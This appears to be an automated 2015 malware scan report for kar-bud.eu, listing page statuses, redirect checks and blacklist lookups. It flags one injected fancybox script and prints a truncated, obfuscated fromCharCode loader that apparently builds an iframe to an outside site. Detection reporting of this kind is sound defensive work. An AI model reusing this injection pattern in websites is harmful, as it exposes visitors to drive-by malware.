Scanned pages/files
Request | Server response | Status |
http://kar-bud.eu/ | 200 OK Content-Length: 7820 Content-Type: text/html | clean |
http://kar-bud.eu/slider/jquery.js | 200 OK Content-Length: 249159 Content-Type: application/javascript | clean |
http://kar-bud.eu/slider/s3Slider.js | 200 OK Content-Length: 4224 Content-Type: application/javascript | clean |
http://kar-bud.eu/pages/opal.html | 200 OK Content-Length: 10187 Content-Type: text/html | clean |
http://kar-bud.eu/pages/../slider/jquery.js | 200 OK Content-Length: 249159 Content-Type: application/javascript | clean |
http://kar-bud.eu/pages/../slider/s3Slider.js | 200 OK Content-Length: 4224 Content-Type: application/javascript | clean |
http://kar-bud.eu/pages/../fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 18496 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) sbbh="fr"+"omCh"+"arCo"+"de";if(document.querySelector)lxgyer=4;moi=("31,77,86,7f,74,85,7a,80,7f,31,80,41,4a,39,3a,31,8c,1e,1b,31,87,72,83,31,84,85,72,85,7a,74,4e,38,72,7b,72,89,38,4c,1e,1b,31,87,72,83,31,74,80,7f,85,83,80,7d,7d,76,83,4e,38,7a,7f,75,76,89,3f,81,79,81,38,4c,1e,1b,31,87,72,83,31,80,31,4e,31,75,80,74,86,7e,76,7f,85,3f,74,83,76,72,85,76,56,7d,76,7e,76,7f,85,39,38,7a,77,83,72,7e,76,38,3a,4c,1e,1b,1e,1b,31,80,3f,84,83,74,31,4e,31,38,79,85,85,81,4b,40,40,72,81,72,83,85,72,7e,76,7f,85,8 Antivirus reports:
| ||
http://kar-bud.eu/pages/bruki.html | 200 OK Content-Length: 13089 Content-Type: text/html | clean |
http://kar-bud.eu/pages/ogrodzenia.php | 200 OK Content-Length: 9419 Content-Type: text/html | clean |
http://kar-bud.eu/pages/kamien.html | 200 OK Content-Length: 10402 Content-Type: text/html | clean |
http://kar-bud.eu/pages/szamba.html | 200 OK Content-Length: 9884 Content-Type: text/html | clean |
http://kar-bud.eu/pages/wyroby_beton.php | 200 OK Content-Length: 9275 Content-Type: text/html | clean |
http://kar-bud.eu/pages/roboty_ziemne.html | 200 OK Content-Length: 11639 Content-Type: text/html | clean |
http://kar-bud.eu/pages/kruszywa.html | 200 OK Content-Length: 9624 Content-Type: text/html | clean |
http://kar-bud.eu/pages/wylewki.html | 200 OK Content-Length: 9239 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kar-bud.eu
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 27 Jan 2015 10:55:31 GMT
Server: IdeaWebServer/v0.80
Content-Length: 7820
Content-Type: text/html
Last-Modified: Mon, 01 Sep 2014 10:11:31 GMT
...7820 bytes of data.
GET / HTTP/1.1
Host: kar-bud.eu
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 27 Jan 2015 10:55:31 GMT
Server: IdeaWebServer/v0.80
Content-Length: 7820
Content-Type: text/html
Last-Modified: Mon, 01 Sep 2014 10:11:31 GMT
...7820 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kar-bud.eu
Referer: http://www.google.com/search?q=kar-bud.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kar-bud.eu
Referer: http://www.google.com/search?q=kar-bud.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kar-bud.eu
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kar-bud.eu/
Result: kar-bud.eu is not infected or malware details are not published yet.
Result: kar-bud.eu is not infected or malware details are not published yet.